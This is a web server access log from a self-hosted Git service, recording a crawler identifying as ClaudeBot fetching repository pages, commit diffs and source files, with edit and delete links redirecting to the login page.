- GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?state=all" [Client 216.73.216.188] [Length 8472] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?state=closed" [Client 216.73.216.188] [Length 8488] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?state=all" [Client 216.73.216.188] [Length 8478] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Fcode-frequency" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Fcontributors" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Fweekly" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Fyearly" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Flabels" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fmilestones" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Fsemiyearly" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Fcontributors" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Fdaily" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Fmonthly" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Frecent-commits" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Fdaily" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Fsemiyearly" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Fyearly" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Flabels" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fmilestones" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Fquarterly" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/services" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/services" -[15/Feb/2026:09:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a.patch" [Client 216.73.216.188] [Length 63577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data" -[15/Feb/2026:09:30:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/global.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/global.json" -[15/Feb/2026:09:30:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.vscode/settings.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.vscode/settings.json" -[15/Feb/2026:09:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15776] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 216.73.216.188] [Length 7522] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" [Client 216.73.216.188] [Length 10452] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 216.73.216.188] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.vscode/launch.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.vscode/launch.json" -[15/Feb/2026:09:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 216.73.216.188] [Length 11592] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" [Client 216.73.216.188] [Length 16243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/tsconfig.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/tsconfig.json" -[15/Feb/2026:09:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a.diff" [Client 216.73.216.188] [Length 63098] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 216.73.216.188] [Length 10796] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/global.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/global.json" -[15/Feb/2026:09:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" [Client 216.73.216.188] [Length 11555] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/README.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/README.md" -[15/Feb/2026:09:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 10215] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs?display=source" [Client 216.73.216.188] [Length 17691] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 216.73.216.188] [Length 6440] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.vscode/launch.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.vscode/launch.json" -[15/Feb/2026:09:30:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/start.sh" -[15/Feb/2026:09:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/README.md" -[15/Feb/2026:09:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/global.json" [Client 216.73.216.188] [Length 9810] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.patch" [Client 216.73.216.188] [Length 207177] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 216.73.216.188] [Length 12172] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/tsconfig.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/tsconfig.json" -[15/Feb/2026:09:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" [Client 216.73.216.188] [Length 10391] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" [Client 216.73.216.188] [Length 11495] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json?display=source" [Client 216.73.216.188] [Length 11354] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj?display=rendered" [Client 216.73.216.188] [Length 11141] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/css" [Client 216.73.216.188] [Length 10348] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/index.html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/start.sh" -[15/Feb/2026:09:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.diff" [Client 216.73.216.188] [Length 115569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/index.html" -[15/Feb/2026:09:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 11992] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/updateRecord.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/Program.cs" [Client 216.73.216.188] [Length 9810] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/updateRecord.md" 